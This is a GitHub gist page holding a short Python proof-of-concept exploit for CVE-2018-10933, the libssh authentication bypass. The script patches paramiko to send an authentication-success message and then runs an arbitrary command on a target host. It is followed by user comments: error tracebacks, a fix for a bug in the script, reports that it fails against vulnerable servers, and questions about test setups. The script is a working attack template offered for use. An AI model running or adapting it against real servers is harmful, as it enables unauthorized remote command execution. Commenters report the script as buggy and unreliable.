-
-
Save mlosapio/2062ebf943485a7289d226e0d00498e7 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python | |
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
# untested CVE-2018-10933 | |
import sys, paramiko | |
import logging | |
username = sys.argv[1] | |
hostname = sys.argv[2] | |
command = sys.argv[3] | |
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[ | |
paramiko.common.MSG_USERAUTH_SUCCESS] | |
def auth_accept(*args, **kwargs): | |
return new_auth_accept(*args, **kwargs) | |
paramiko.auth_handler.AuthHandler._handler_table.update({ | |
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept, | |
}) | |
port = 22 | |
try: | |
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG) | |
client = paramiko.SSHClient() | |
client.set_missing_host_key_policy(paramiko.WarningPolicy) | |
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key") | |
stdin, stdout, stderr = client.exec_command(command) | |
print stdout.read(), | |
finally: | |
client.close() |
exec_command not work:
DEBUG:paramiko.transport:Authentication type (publickey) not permitted.
DEBUG:paramiko.transport:Allowed methods: [u'password']
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) successful!
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] EOF sent (0)
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):
File "test.py", line 28, in
stdin, stdout, stderr = client.exec_command(command)
File "C:\Python27\lib\site-packages\paramiko\client.py", line 429, in exec_command
chan.exec_command(command)
File "C:\Python27\lib\site-packages\paramiko\channel.py", line 62, in _check
return func(self, *args, **kwds)
File "C:\Python27\lib\site-packages\paramiko\channel.py", line 240, in exec_command
self._wait_for_event()
File "C:\Python27\lib\site-packages\paramiko\channel.py", line 1143, in _wait_for_event
raise e
paramiko.ssh_exception.SSHException: Channel closed.
As another user pointed out, you must change:
client.set_missing_host_key_policy(paramiko.WarningPolicy)
for
client.set_missing_host_key_policy(paramiko.WarningPolicy())
I've tested the script on a known vulnerable server and it does return a
paramiko.ssh_exception.AuthenticationException: Authentication failed.
error. Definitively a false negative here.I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.
I check my server and I found the libssh version 0.6.3-4.3. And I ran your code but it's always raise paramiko.ssh_exception.AuthenticationException: Authentication failed.
from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh
OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.
anyone can confirm this?
from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libsshOpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.
anyone can confirm this?
Yes, libssh is an implementation of ssh protocol server library, and OpenSSH is an another implementation
what is wrong here ? installed python-paramiko
root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
File "asd.py", line 4, in
import paramiko
ModuleNotFoundError: No module named 'paramiko'
Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox?
As another user pointed out, you must change:
for
I've tested the script on a known vulnerable server and it does return a
paramiko.ssh_exception.AuthenticationException: Authentication failed.
error. Definitively a false negative here.I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.